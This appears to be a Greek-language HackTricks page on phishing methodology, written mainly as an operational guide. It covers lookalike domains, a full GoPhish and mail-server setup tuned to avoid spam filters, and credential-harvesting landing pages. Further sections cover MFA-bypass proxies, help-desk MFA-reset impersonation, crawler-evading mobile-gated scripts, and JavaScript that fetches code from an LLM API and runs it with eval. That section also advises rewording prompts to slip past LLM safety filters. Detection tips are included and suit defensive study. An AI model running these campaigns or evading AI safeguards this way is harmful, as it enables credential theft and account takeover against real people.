Phishing Μεθοδολογία

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Μάθετε & εξασκηθείτε στο Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks

Μεθοδολογία

  1. Recon του θύματος
  2. Επιλέξτε το victim domain.
  3. Πραγματοποιήστε βασική web enumeration αναζητώντας login portals που χρησιμοποιεί το θύμα και αποφασίστε ποιο από αυτά θα παραστήσετε.
  4. Χρησιμοποιήστε κάποιο OSINT για να βρείτε emails.
  5. Προετοιμάστε το περιβάλλον
  6. Buy the domain που θα χρησιμοποιήσετε για την αξιολόγηση phishing
  7. Configure the email service σχετικά εγγραφές (SPF, DMARC, DKIM, rDNS)
  8. Διαμορφώστε το VPS με gophish
  9. Προετοιμάστε την καμπάνια
  10. Ετοιμάστε το email template
  11. Ετοιμάστε τη web page για να κλέψετε τα credentials
  12. Launch the campaign!

Generate similar domain names or buy a trusted domain

Τεχνικές παραλλαγής ονόματος domain

  • Keyword: Το όνομα domain περιέχει μια σημαντική λέξη-κλειδί του αρχικού domain (π.χ., zelster.com-management.com).
  • hypened subdomain: Αντικαταστήστε την τελεία με παύλα ενός subdomain (π.χ., www-zelster.com).
  • New TLD: Το ίδιο domain χρησιμοποιώντας μια νέα TLD (π.χ., zelster.org)
  • Homoglyph: Αντικαθιστά ένα γράμμα στο όνομα domain με γράμματα που μοιάζουν (π.χ., zelfser.com).

Homograph Attacks

  • Transposition: Ανταλλάσσει δύο γράμματα μέσα στο όνομα domain (π.χ., zelsetr.com).
  • Singularization/Pluralization: Προσθέτει ή αφαιρεί το “s” στο τέλος του ονόματος domain (π.χ., zeltsers.com).
  • Omission: Αφαιρεί ένα από τα γράμματα από το όνομα domain (π.χ., zelser.com).
  • Repetition: Επαναλαμβάνει ένα από τα γράμματα στο όνομα domain (π.χ., zeltsser.com).
  • Replacement: Παρόμοιο με homoglyph αλλά λιγότερο διακριτικό. Αντικαθιστά ένα από τα γράμματα στο όνομα domain, ίσως με γράμμα κοντά στο αρχικό στο πληκτρολόγιο (π.χ., zektser.com).
  • Subdomained: Εισάγει μια τελεία μέσα στο όνομα domain (π.χ., ze.lster.com).
  • Insertion: Εισάγει ένα γράμμα μέσα στο όνομα domain (π.χ., zerltser.com).
  • Missing dot: Προσάρτηση του TLD στο όνομα domain. (π.χ., zelstercom.com)

Automatic Tools

Websites

Bitflipping

Υπάρχει η πιθανότητα κάποιο από τα bits που αποθηκεύονται ή μεταδίδονται να αντιστραφεί αυτόματα λόγω διαφόρων παραγόντων όπως ηλιακές εκλάμψεις, κοσμικές ακτίνες ή σφάλματα υλικού.

Όταν αυτή η έννοια εφαρμόζεται σε DNS αιτήματα, είναι πιθανό το domain που λαμβάνει ο DNS server να μην είναι το ίδιο με το domain που αρχικά ζητήθηκε.

Για παράδειγμα, μια τροποποίηση ενός μόνο bit στο domain “windows.com” μπορεί να το αλλάξει σε “windnws.com.”

Οι επιτιθέμενοι μπορεί να εκμεταλλευτούν αυτό καταχωρώντας πολλαπλά bit-flipping domains που είναι παρόμοια με το domain του θύματος. Ο στόχος τους είναι να ανακατευθύνουν νόμιμους χρήστες στην υποδομή τους.

For more information read https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/

Buy a trusted domain

You can search in https://www.expireddomains.net/ for an expired domain that you could use.
In order to make sure that the expired domain that you are going to buy has already a good SEO you could search how is it categorized in:

Discovering Emails

In order to discover more valid email addresses or verify the ones you have already discovered you can check if you can brute-force them smtp servers of the victim. Learn how to verify/discover email address here.
Moreover, don’t forget that if the users use any web portal to access their mails, you can check if it’s vulnerable to username brute force, and exploit the vulnerability if possible.

Configuring GoPhish

Installation

You can download it from https://github.com/gophish/gophish/releases/tag/v0.11.0

Κατεβάστε και αποσυμπιέστε το μέσα στο /opt/gophish και εκτελέστε /opt/gophish/gophish
Στην έξοδο θα σας δοθεί ένας κωδικός για τον χρήστη admin στην πόρτα 3333. Επομένως, προσπελάστε αυτή την πόρτα και χρησιμοποιήστε αυτά τα διαπιστευτήρια για να αλλάξετε τον κωδικό admin. Μπορεί να χρειαστεί να tunnel αυτή την πόρτα τοπικά:

ssh -L 3333:127.0.0.1:3333 <user>@<ip>

Διαμόρφωση

Διαμόρφωση πιστοποιητικού TLS

Πριν από αυτό το βήμα θα πρέπει να έχετε ήδη αγοράσει το domain που πρόκειται να χρησιμοποιήσετε και πρέπει να δείχνει στην IP του VPS όπου διαμορφώνετε το gophish.

DOMAIN="<domain>"
wget https://dl.eff.org/certbot-auto
chmod +x certbot-auto
sudo apt install snapd
sudo snap install core
sudo snap refresh core
sudo apt-get remove certbot
sudo snap install --classic certbot
sudo ln -s /snap/bin/certbot /usr/bin/certbot
certbot certonly --standalone -d "$DOMAIN"
mkdir /opt/gophish/ssl_keys
cp "/etc/letsencrypt/live/$DOMAIN/privkey.pem" /opt/gophish/ssl_keys/key.pem
cp "/etc/letsencrypt/live/$DOMAIN/fullchain.pem" /opt/gophish/ssl_keys/key.crt​

Ρύθμιση Mail

Ξεκινήστε την εγκατάσταση: apt-get install postfix

Στη συνέχεια προσθέστε το domain στα παρακάτω αρχεία:

  • /etc/postfix/virtual_domains
  • /etc/postfix/transport
  • /etc/postfix/virtual_regexp

Αλλάξτε επίσης τις τιμές των παρακάτω μεταβλητών μέσα στο /etc/postfix/main.cf

myhostname = <domain>
mydestination = $myhostname, <domain>, localhost.com, localhost

Τέλος τροποποιήστε τα αρχεία /etc/hostname και /etc/mailname με το domain σας και επανεκκινήστε το VPS σας.

Τώρα δημιουργήστε μια DNS A record για το mail.<domain> που δείχνει στη διεύθυνση IP του VPS και μια DNS MX εγγραφή που δείχνει στο mail.<domain>

Τώρα ας δοκιμάσουμε να στείλουμε ένα email:

apt install mailutils
echo "This is the body of the email" | mail -s "This is the subject line" test@email.com

Διαμόρφωση Gophish

Σταματήστε την εκτέλεση του gophish και ας το διαμορφώσουμε.
Τροποποιήστε /opt/gophish/config.json ως εξής (σημειώστε τη χρήση του https):

{
"admin_server": {
"listen_url": "127.0.0.1:3333",
"use_tls": true,
"cert_path": "gophish_admin.crt",
"key_path": "gophish_admin.key"
},
"phish_server": {
"listen_url": "0.0.0.0:443",
"use_tls": true,
"cert_path": "/opt/gophish/ssl_keys/key.crt",
"key_path": "/opt/gophish/ssl_keys/key.pem"
},
"db_name": "sqlite3",
"db_path": "gophish.db",
"migrations_prefix": "db/db_",
"contact_address": "",
"logging": {
"filename": "",
"level": ""
}
}

Διαμόρφωση υπηρεσίας gophish

Για να δημιουργήσετε την υπηρεσία gophish ώστε να μπορεί να ξεκινάει αυτόματα και να διαχειρίζεται ως υπηρεσία, μπορείτε να δημιουργήσετε το αρχείο /etc/init.d/gophish με το ακόλουθο περιεχόμενο:

#!/bin/bash
# /etc/init.d/gophish
# initialization file for stop/start of gophish application server
#
# chkconfig: - 64 36
# description: stops/starts gophish application server
# processname:gophish
# config:/opt/gophish/config.json
# From https://github.com/gophish/gophish/issues/586

# define script variables

processName=Gophish
process=gophish
appDirectory=/opt/gophish
logfile=/var/log/gophish/gophish.log
errfile=/var/log/gophish/gophish.error

start() {
echo 'Starting '${processName}'...'
cd ${appDirectory}
nohup ./$process >>$logfile 2>>$errfile &
sleep 1
}

stop() {
echo 'Stopping '${processName}'...'
pid=$(/bin/pidof ${process})
kill ${pid}
sleep 1
}

status() {
pid=$(/bin/pidof ${process})
if [["$pid" != ""| "$pid" != "" ]]; then
echo ${processName}' is running...'
else
echo ${processName}' is not running...'
fi
}

case $1 in
start|stop|status) "$1" ;;
esac

Ολοκληρώστε τη ρύθμιση της υπηρεσίας και ελέγξτε την κάνοντας:

mkdir /var/log/gophish
chmod +x /etc/init.d/gophish
update-rc.d gophish defaults
#Check the service
service gophish start
service gophish status
ss -l | grep "3333\|443"
service gophish stop

Διαμόρφωση mail server και domain

Περίμενε και να φαίνεσαι νόμιμος

Όσο παλαιότερο είναι ένα domain, τόσο λιγότερο πιθανό είναι να χαρακτηριστεί ως spam. Γι’ αυτό πρέπει να περιμένεις όσο το δυνατόν περισσότερο (τουλάχιστον 1 εβδομάδα) πριν την phishing αξιολόγηση. Επιπλέον, αν προσθέσεις μια σελίδα σχετική με έναν τομέα που ενισχύει τη φήμη, η φήμη που θα αποκτηθεί θα είναι καλύτερη.

Σημείωση: ακόμη και αν πρέπει να περιμένεις μια εβδομάδα, μπορείς να ολοκληρώσεις τώρα όλη τη διαμόρφωση.

Configure Reverse DNS (rDNS) record

Δημιούργησε μια εγγραφή rDNS (PTR) που επιλύει τη διεύθυνση IP του VPS στο domain name.

Sender Policy Framework (SPF) Record

Πρέπει να διαμορφώσεις μια SPF εγγραφή για το νέο domain. Αν δεν ξέρεις τι είναι μια SPF εγγραφή διάβασε αυτή τη σελίδα.

Μπορείς να χρησιμοποιήσεις https://www.spfwizard.net/ για να δημιουργήσεις την SPF πολιτική σου (χρησιμοποίησε τη διεύθυνση IP του VPS)

Αυτό είναι το περιεχόμενο που πρέπει να τεθεί μέσα σε μια εγγραφή TXT στο domain:

v=spf1 mx a ip4:ip.ip.ip.ip ?all

Εγγραφή DMARC (Domain-based Message Authentication, Reporting & Conformance)

Πρέπει να διαμορφώσετε μια εγγραφή DMARC για το νέο domain. Αν δεν ξέρετε τι είναι μια εγγραφή DMARC read this page.

Πρέπει να δημιουργήσετε μια νέα DNS TXT εγγραφή που δείχνει το hostname _dmarc.<domain> με το ακόλουθο περιεχόμενο:

v=DMARC1; p=none

DomainKeys Identified Mail (DKIM)

Πρέπει να διαμορφώσετε ένα DKIM για το νέο domain. Αν δεν ξέρετε τι είναι μια εγγραφή DMARC read this page.

This tutorial is based on: https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy

Tip

Χρειάζεται να συγχωνεύσετε και τις δύο τιμές B64 που παράγει το DKIM key:

v=DKIM1; h=sha256; k=rsa; p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0wPibdqPtzYk81njjQCrChIcHzxOp8a1wjbsoNtka2X9QXCZs+iXkvw++QsWDtdYu3q0Ofnr0Yd/TmG/Y2bBGoEgeE+YTUG2aEgw8Xx42NLJq2D1pB2lRQPW4IxefROnXu5HfKSm7dyzML1gZ1U0pR5X4IZCH0wOPhIq326QjxJZm79E1nTh3xj" "Y9N/Dt3+fVnIbMupzXE216TdFuifKM6Tl6O/axNsbswMS1TH812euno8xRpsdXJzFlB9q3VbMkVWig4P538mHolGzudEBg563vv66U8D7uuzGYxYT4WS8NVm3QBMg0QKPWZaKp+bADLkOSB9J2nUpk4Aj9KB5swIDAQAB

Test your email configuration score

Μπορείτε να το κάνετε χρησιμοποιώντας https://www.mail-tester.com/
Απλά επισκεφθείτε τη σελίδα και στείλτε ένα email στη διεύθυνση που σας δίνουν:

echo "This is the body of the email" | mail -s "This is the subject line" test-iimosa79z@srv1.mail-tester.com

Μπορείτε επίσης να ελέγξετε τη ρύθμιση του email στέλνοντας ένα email στο check-auth@verifier.port25.com και διαβάζοντας την απάντηση (για αυτό θα χρειαστεί να ανοίξετε το port 25 και να δείτε την απάντηση στο αρχείο /var/mail/root εάν στείλετε το email ως root).
Ελέγξτε ότι περνάτε όλα τα tests:

==========================================================
Summary of Results
==========================================================
SPF check:          pass
DomainKeys check:   neutral
DKIM check:         pass
Sender-ID check:    pass
SpamAssassin check: ham

Μπορείτε επίσης να στείλετε μήνυμα σε λογαριασμό Gmail που ελέγχετε, και να ελέγξετε τις κεφαλίδες του email στα εισερχόμενα του Gmail, το dkim=pass πρέπει να είναι παρόν στο πεδίο κεφαλίδας Authentication-Results.

Authentication-Results: mx.google.com;
spf=pass (google.com: domain of contact@example.com designates --- as permitted sender) smtp.mail=contact@example.com;
dkim=pass header.i=@example.com;

Αφαίρεση από Spamhouse Blacklist

Η σελίδα www.mail-tester.com μπορεί να σας δείξει εάν το domain σας μπλοκάρεται από spamhouse. Μπορείτε να ζητήσετε να αφαιρεθεί το domain/IP σας εδώ: ​https://www.spamhaus.org/lookup/

Αφαίρεση από Microsoft Blacklist

​​Μπορείτε να ζητήσετε την αφαίρεση του domain/IP σας στο https://sender.office.com/.

Δημιουργία & Εκκίνηση GoPhish Campaign

Προφίλ Αποστολής

  • Ορίστε ένα όνομα για αναγνώριση του προφίλ αποστολέα
  • Αποφασίστε από ποιο λογαριασμό θα στείλετε τα phishing emails. Προτάσεις: noreply, support, servicedesk, salesforce…
  • Μπορείτε να αφήσετε κενά τα username και password, αλλά βεβαιωθείτε ότι έχετε επιλέξει το Ignore Certificate Errors

Tip

Συνιστάται να χρησιμοποιήσετε τη λειτουργία “Send Test Email” για να ελέγξετε ότι όλα λειτουργούν.
Θα πρότεινα να στείλετε τα test emails σε διευθύνσεις 10min mails προκειμένου να αποφύγετε να γίνετε blacklisted κατά τις δοκιμές.

Πρότυπο Email

  • Ορίστε ένα όνομα για να αναγνωρίζετε το πρότυπο
  • Στη συνέχεια γράψτε ένα θέμα (τίποτα περίεργο, απλά κάτι που να περιμένατε να διαβάσετε σε ένα κανονικό email)
  • Βεβαιωθείτε ότι έχετε επιλέξει “Add Tracking Image
  • Γράψτε το πρότυπο email (μπορείτε να χρησιμοποιήσετε μεταβλητές όπως στο ακόλουθο παράδειγμα):
<html>
<head>
<title></title>
</head>
<body>
<p class="MsoNormal"><span style="font-size:10.0pt;font-family:&quot;Verdana&quot;,sans-serif;color:black">Dear {{.FirstName}} {{.LastName}},</span></p>
<br />
Note: We require all user to login an a very suspicios page before the end of the week, thanks!<br />
<br />
Regards,</span></p>

WRITE HERE SOME SIGNATURE OF SOMEONE FROM THE COMPANY

<p>{{.Tracker}}</p>
</body>
</html>

Σημειώστε ότι για να αυξήσετε την αξιοπιστία του email, συνιστάται να χρησιμοποιήσετε κάποια υπογραφή από ένα email του πελάτη. Προτάσεις:

  • Στείλτε ένα email σε μια μη υπάρχουσα διεύθυνση και ελέγξτε αν η απάντηση περιέχει κάποια υπογραφή.
  • Αναζητήστε δημόσια emails όπως info@ex.com ή press@ex.com ή public@ex.com, στείλτε τους email και περιμένετε την απάντηση.
  • Προσπαθήστε να επικοινωνήσετε με κάποιο έγκυρο εντοπισμένο email και περιμένετε την απάντηση

Tip

Το Email Template επίσης επιτρέπει να επισυνάψετε αρχεία για αποστολή. Αν θέλετε επίσης να κλέψετε NTLM challenges χρησιμοποιώντας κάποια ειδικά κατασκευασμένα αρχεία/έγγραφα διαβάστε αυτή τη σελίδα.

Landing Page

  • Γράψτε ένα όνομα
  • Γράψτε τον HTML κώδικα της σελίδας. Σημειώστε ότι μπορείτε να εισάγετε web pages.
  • Επισημάνετε Capture Submitted Data και Capture Passwords
  • Ορίστε μια ανακατεύθυνση

Tip

Συνήθως θα χρειαστεί να τροποποιήσετε τον HTML κώδικα της σελίδας και να κάνετε δοκιμές τοπικά (ίσως χρησιμοποιώντας κάποιο Apache server) μέχρι να σας αρέσουν τα αποτελέσματα. Στη συνέχεια, γράψτε αυτόν τον HTML κώδικα στο πεδίο.
Σημειώστε ότι αν χρειάζεστε στατικά resources για το HTML (π.χ. CSS και JS) μπορείτε να τα αποθηκεύσετε στο /opt/gophish/static/endpoint και μετά να τα προσεγγίσετε από /static/<filename>

Tip

Για την ανακατεύθυνση μπορείτε να ανακατευθύνετε τους χρήστες στην νόμιμη κύρια σελίδα του θύματος, ή να τους στείλετε στο /static/migration.html για παράδειγμα, βάλτε έναν spinner (https://loading.io/) για 5 δευτερόλεπτα και μετά δηλώστε ότι η διαδικασία ήταν επιτυχής.

Users & Groups

  • Ορίστε ένα όνομα
  • Εισάγετε τα δεδομένα (σημειώστε ότι για να χρησιμοποιήσετε το template στο παράδειγμα χρειάζεστε το firstname, last name και τη διεύθυνση email κάθε χρήστη)

Campaign

Τέλος, δημιουργήστε μια campaign επιλέγοντας όνομα, το email template, τη landing page, το URL, το sending profile και την group. Σημειώστε ότι το URL θα είναι το link που θα σταλεί στα θύματα

Σημειώστε ότι το Sending Profile επιτρέπει να στείλετε ένα test email για να δείτε πώς θα φαίνεται το τελικό phishing email:

Tip

Συστήνω να στέλνετε τα test emails σε διευθύνσεις 10min mail για να αποφύγετε το να μπείτε σε blacklist κατά τις δοκιμές.

Μόλις όλα είναι έτοιμα, απλά ξεκινήστε την καμπάνια!

Website Cloning

Αν για κάποιο λόγο θέλετε να κλωνοποιήσετε την ιστοσελίδα, δείτε την παρακάτω σελίδα:

Clone a Website

Backdoored Documents & Files

Σε κάποιες phishing αξιολογήσεις (κυρίως για Red Teams) μπορεί να θέλετε επίσης να στείλετε αρχεία που περιέχουν κάποιο είδος backdoor (ίσως ένα C2 ή κάτι που θα ενεργοποιήσει μια αυθεντικοποίηση).
Δείτε την παρακάτω σελίδα για μερικά παραδείγματα:

Phishing Files & Documents

Phishing MFA

Via Proxy MitM

Η προηγούμενη επίθεση είναι αρκετά “έξυπνη” καθώς πλαστογραφείτε μια πραγματική σελίδα και συλλέγετε τις πληροφορίες που εισάγει ο χρήστης. Δυστυχώς, αν ο χρήστης δεν έβαλε τον σωστό κωδικό ή αν η εφαρμογή που πλαστογράφησε είναι ρυθμισμένη με 2FA, αυτές οι πληροφορίες δεν θα σας επιτρέψουν να μιμηθείτε τον εξαπατημένο χρήστη.

Εδώ είναι χρήσιμα εργαλεία όπως evilginx2, CredSniper και muraena. Το εργαλείο αυτό θα σας επιτρέψει να δημιουργήσετε μια επίθεση MitM. Βασικά, η επίθεση λειτουργεί ως εξής:

  1. Εσείς πλαστογραφείτε τη φόρμα login της πραγματικής σελίδας.
  2. Ο χρήστης στέλνει τα credentials του στη ψεύτικη σελίδα και το εργαλείο τα στέλνει στην πραγματική σελίδα, ελέγχοντας αν τα credentials δουλεύουν.
  3. Αν ο λογαριασμός είναι ρυθμισμένος με 2FA, η MitM σελίδα θα ζητήσει το 2FA και μόλις ο χρήστης το εισάγει το εργαλείο θα το στείλει στην πραγματική σελίδα.
  4. Μόλις ο χρήστης αυθεντικοποιηθεί, εσείς (ως attacker) θα έχετε συλλάβει τα credentials, το 2FA, το cookie και κάθε πληροφορία από κάθε αλληλεπίδραση ενώ το εργαλείο εκτελεί MitM.

Via VNC

Τι γίνεται αν αντί να στείλετε το θύμα σε μια κακόβουλη σελίδα με όψη ίδια με την αρχική, το στείλετε σε μια VNC συνεδρία με browser συνδεδεμένο στην πραγματική σελίδα; Θα μπορείτε να δείτε τι κάνει, να κλέψετε τον κωδικό, το MFA που χρησιμοποιήθηκε, τα cookies…
Μπορείτε να το κάνετε αυτό με EvilnVNC

Detecting the detection

Προφανώς ένας από τους καλύτερους τρόπους να ξέρετε αν έχετε «πιαστεί» είναι να ελέγξετε το domain σας σε blacklists. Αν εμφανίζεται σε λίστα, κάπως το domain σας ανιχνεύτηκε ως ύποπτο.
Ένας εύκολος τρόπος να ελέγξετε αν το domain σας εμφανίζεται σε κάποια blacklist είναι να χρησιμοποιήσετε https://malwareworld.com/

Ωστόσο, υπάρχουν και άλλοι τρόποι να γνωρίζετε αν το θύμα αναζητά ενεργά ύποπτη phishing δραστηριότητα στο wild όπως εξηγείται σε:

Detecting Phishing

Μπορείτε να αγοράσετε ένα domain με πολύ παρόμοιο όνομα με το domain του θύματος και/ή να δημιουργήσετε ένα certificate για ένα subdomain ενός domain που ελέγχετε εσείς περιλαμβάνοντας την λέξη-κλειδί του domain του θύματος. Αν το θύμα κάνει οποιοδήποτε είδος DNS ή HTTP αλληλεπίδρασης με αυτά, θα γνωρίζετε ότι αναζητά ενεργά ύποπτους domain και θα χρειαστεί να είστε πολύ stealth.

Evaluate the phishing

Χρησιμοποιήστε Phishious για να αξιολογήσετε αν το email σας θα καταλήξει στο φάκελο spam ή αν θα μπλοκαριστεί ή θα είναι επιτυχές.

High-Touch Identity Compromise (Help-Desk MFA Reset)

Σύγχρονα intrusion sets όλο και περισσότερο παρακάμπτουν εντελώς τα email lures και στοχεύουν άμεσα τη ροή service-desk / identity-recovery για να παρακάμψουν το MFA. Η επίθεση είναι πλήρως “living-off-the-land”: μόλις ο χειριστής αποκτήσει έγκυρα credentials, κινείται με τα ενσωματωμένα admin εργαλεία – δεν χρειάζεται malware.

Attack flow

  1. Recon the victim
  • Συλλογή προσωπικών & εταιρικών στοιχείων από LinkedIn, data breaches, public GitHub, κ.λπ.
  • Εντοπισμός υψηλής αξίας ταυτοτήτων (executives, IT, finance) και καταγραφή της ακριβούς διαδικασίας help-desk για reset κωδικού / MFA.
  1. Real-time social engineering
  • Τηλέφωνο, Teams ή chat στο help-desk ενώ μιμείστε το θύμα (συχνά με spoofed caller-ID ή cloned voice).
  • Παροχή των προηγουμένως συλλεχθέντων PII για να περάσετε την επαλήθευση βασισμένη στη γνώση.
  • Πείστε τον agent να resetάρει το MFA secret ή να εκτελέσει SIM-swap σε έναν εγγεγραμμένο αριθμό κινητού.
  1. Immediate post-access actions (≤60 min in real cases)
  • Εγκαθιδρύστε foothold μέσω οποιουδήποτε web SSO portal.
  • Εξερευνήστε AD / AzureAD με ενσωματωμένα εργαλεία (χωρίς να ρίξετε binaries):
# list directory groups & privileged roles
Get-ADGroup -Filter * -Properties Members | ?{$_.Members -match $env:USERNAME}

# AzureAD / Graph – list directory roles
Get-MgDirectoryRole | ft DisplayName,Id

# Enumerate devices the account can login to
Get-MgUserRegisteredDevice -UserId <user@corp.local>
  • Lateral movement με WMI, PsExec, ή νόμιμους RMM agents που είναι ήδη whitelisted στο περιβάλλον.

Detection & Mitigation

  • Αντιμετωπίστε την ταυτοποίηση help-desk ως privileged operation – απαιτήστε step-up auth & έγκριση manager.
  • Αναπτύξτε κανόνες Identity Threat Detection & Response (ITDR) / UEBA που ειδοποιούν για:
  • Αλλαγή μεθόδου MFA + authentication από νέα συσκευή / γεωγραφία.
  • Άμεση αναβάθμιση του ίδιου principal (user-→-admin).
  • Καταγράψτε help-desk κλήσεις και επιβάλετε call-back σε ήδη εγγεγραμμένο αριθμό πριν από οποιοδήποτε reset.
  • Εφαρμόστε Just-In-Time (JIT) / Privileged Access ώστε τα πρόσφατα reset accounts να μην κληρονομούν αυτόματα high-privilege tokens.

At-Scale Deception – SEO Poisoning & “ClickFix” Campaigns

Commodity crews καλύπτουν το κόστος των high-touch ops με μαζικές επιθέσεις που μετατρέπουν τις μηχανές αναζήτησης & τα ad networks σε κανάλι παράδοσης.

  1. SEO poisoning / malvertising σπρώχνει ένα ψεύτικο αποτέλεσμα όπως chromium-update[.]site στην κορυφή των search ads.
  2. Το θύμα κατεβάζει έναν μικρό first-stage loader (συχνά JS/HTA/ISO). Παραδείγματα που είδε η Unit 42:
  • RedLine stealer
  • Lumma stealer
  • Lampion Trojan
  1. Ο loader εξάγει browser cookies + credential DBs, μετά κατεβάζει έναν σιωπηλό loader που αποφασίζει – σε πραγματικό χρόνο – αν θα αναπτύξει:
  • RAT (π.χ. AsyncRAT, RustDesk)
  • ransomware / wiper
  • persistence component (registry Run key + scheduled task)

Hardening tips

  • Μπλοκάρετε newly-registered domains & επιβάλετε Advanced DNS / URL Filtering σε search-ads καθώς και σε email.
  • Περιορίστε την εγκατάσταση λογισμικού σε signed MSI / Store packages, απαγορεύστε την εκτέλεση HTA, ISO, VBS με policy.
  • Παρακολουθήστε για child processes των browsers που ανοίγουν installers:
- parent_image: /Program Files/Google/Chrome/*
and child_image: *\\*.exe
  • Κάντε hunt για LOLBins που συχνά κακοποιούνται από first-stage loaders (π.χ. regsvr32, curl, mshta).

AI-Enhanced Phishing Operations

Οι επιτιθέμενοι πλέον αλυσίδωσαν LLM & voice-clone APIs για πλήρως προσωποποιημένα lures και real-time αλληλεπίδραση.

LayerExample use by threat actor
AutomationGenerate & send >100 k emails / SMS with randomised wording & tracking links.
Generative AIProduce one-off emails referencing public M&A, inside jokes from social media; deep-fake CEO voice in callback scam.
Agentic AIAutonomously register domains, scrape open-source intel, craft next-stage mails when a victim clicks but doesn’t submit creds.

Defence: • Προσθέστε δυναμικά banners που επισημαίνουν μηνύματα σταλμένα από μη αξιόπιστη αυτοματοποίηση (λόγω ARC/DKIM anomalies).
• Αναπτύξτε voice-biometric challenge phrases για αιτήματα υψηλού ρίσκου μέσω τηλεφώνου.
• Συνεχίστε να προσομοιώνετε AI-generated lures σε προγράμματα ευαισθητοποίησης – τα στατικά templates είναι παρωχημένα.

Δείτε επίσης – agentic browsing abuse for credential phishing:

Ai Agent Mode Phishing Abusing Hosted Agent Browsers

Δείτε επίσης – AI agent abuse of local CLI tools and MCP (for secrets inventory and detection):

Ai Agent Abuse Local Ai Cli Tools And Mcp

LLM-assisted runtime assembly of phishing JavaScript (in-browser codegen)

Οι επιτιθέμενοι μπορούν να στείλουν HTML που φαίνεται αθώο και να δημιουργήσουν τον stealer κατά το runtime ζητώντας από ένα αξιόπιστο LLM API για JavaScript, και μετά να το εκτελέσουν στο browser (π.χ., eval ή δυναμικό <script>).

  1. Prompt-as-obfuscation: κωδικοποιήστε exfil URLs/Base64 strings στο prompt; επαναλάβετε τη διατύπωση για να παρακάμψετε safety filters και να μειώσετε hallucinations.
  2. Client-side API call: κατά το load, JS καλεί ένα δημόσιο LLM (Gemini/DeepSeek/etc.) ή έναν CDN proxy; μόνο το prompt/API call υπάρχει στο στατικό HTML.
  3. Assemble & exec: συνενώστε την απάντηση και εκτελέστε την (πολυμορφικό ανά επίσκεψη):
fetch("https://llm.example/v1/chat",{method:"POST",body:JSON.stringify({messages:[{role:"user",content:promptText}]}),headers:{"Content-Type":"application/json",Authorization:`Bearer ${apiKey}`}})
.then(r=>r.json())
.then(j=>{const payload=j.choices?.[0]?.message?.content; eval(payload);});
  1. Phish/exfil: ο παραγόμενος κώδικας εξατομικεύει το δόλωμα (π.χ. LogoKit token parsing) και στέλνει τα creds στο endpoint που είναι κρυμμένο στο prompt.

Evasion traits

  • Η κίνηση απευθύνεται σε γνωστά LLM domains ή σε αξιόπιστους CDN proxies· μερικές φορές μέσω WebSockets προς backend.
  • Δεν υπάρχει στατικό payload· κακόβουλο JS υπάρχει μόνο μετά το render.
  • Οι μη-ντετερμινιστικές γεννήσεις παράγουν μοναδικούς stealers ανά συνεδρία.

Detection ideas

  • Τρέξτε sandboxes με ενεργοποιημένο JS· επισημάνετε runtime eval/δυναμική δημιουργία script που προέρχεται από απαντήσεις LLM.
  • Αναζητήστε front-end POSTs προς LLM APIs που ακολουθούνται αμέσως από eval/Function στο επιστρεφόμενο κείμενο.
  • Ειδοποιήστε για μη-εγκεκριμένα LLM domains στην κίνηση του client σε συνδυασμό με μετέπειτα credential POSTs.

MFA Fatigue / Push Bombing Variant – Forced Reset

Εκτός από το κλασικό push-bombing, οι επιτιθέμενοι απλά αναγκάζουν νέα εγγραφή MFA κατά τη διάρκεια της κλήσης help-desk, ακυρώνοντας το υπάρχον token του χρήστη. Οποιοδήποτε επόμενο prompt σύνδεσης φαίνεται νόμιμο στο θύμα.

[Attacker]  →  Help-Desk:  “I lost my phone while travelling, can you unenrol it so I can add a new authenticator?”
[Help-Desk] →  AzureAD: ‘Delete existing methods’ → sends registration e-mail
[Attacker]  →  Completes new TOTP enrolment on their own device

Παρακολουθήστε για AzureAD/AWS/Okta συμβάντα όπου deleteMFA + addMFA συμβαίνουν εντός λεπτών από την ίδια IP.

Clipboard Hijacking / Pastejacking

Οι επιτιθέμενοι μπορούν σιωπηλά να αντιγράψουν κακόβουλες εντολές στο πρόχειρο του θύματος από μια παραβιασμένη ή typosquatted ιστοσελίδα και στη συνέχεια να ξεγελάσουν τον χρήστη να τις επικολλήσει μέσα σε Win + R, Win + X ή σε ένα παράθυρο τερματικού, εκτελώντας αυθαίρετο κώδικα χωρίς καμία λήψη ή συνημμένο。

Clipboard Hijacking

Mobile Phishing & Malicious App Distribution (Android & iOS)

Mobile Phishing Malicious Apps

Mobile‑gated phishing to evade crawlers/sandboxes

Οι operators ολοένα και περισσότερο περιορίζουν τις phishing ροές πίσω από έναν απλό έλεγχο συσκευής ώστε οι desktop crawlers να μην φτάνουν ποτέ στις τελικές σελίδες. Ένα κοινό μοτίβο είναι ένα μικρό script που ελέγχει αν το DOM υποστηρίζει touch και στέλνει το αποτέλεσμα σε ένα server endpoint· οι μη‑mobile clients λαμβάνουν HTTP 500 (ή μια κενή σελίδα), ενώ οι mobile χρήστες εξυπηρετούνται με ολόκληρο το flow.

Minimal client snippet (typical logic):

<script src="/static/detect_device.js"></script>

detect_device.js λογική (απλοποιημένη):

const isMobile = ('ontouchstart' in document.documentElement);
fetch('/detect', {method:'POST', headers:{'Content-Type':'application/json'}, body: JSON.stringify({is_mobile:isMobile})})
.then(()=>location.reload());

Server behaviour often observed:

  • Ο διακομιστής ορίζει cookie συνεδρίας κατά το πρώτο φόρτωμα.
  • Accepts POST /detect {"is_mobile":true|false}.
  • Επιστρέφει 500 (ή placeholder) σε επακόλουθα GETs όταν is_mobile=false; σερβίρει phishing μόνο αν true.

Hunting and detection heuristics:

  • urlscan query: filename:"detect_device.js" AND page.status:500
  • Web τηλεμετρία: ακολουθία GET /static/detect_device.jsPOST /detect → HTTP 500 για μη‑κινητές συσκευές; νόμιμες διαδρομές θυμάτων σε κινητές συσκευές επιστρέφουν 200 με επακόλουθο HTML/JS.
  • Αποκλείστε ή εξετάστε προσεκτικά σελίδες που προσαρμόζουν το περιεχόμενο αποκλειστικά βάσει ontouchstart ή παρόμοιων ελέγχων συσκευής.

Defence tips:

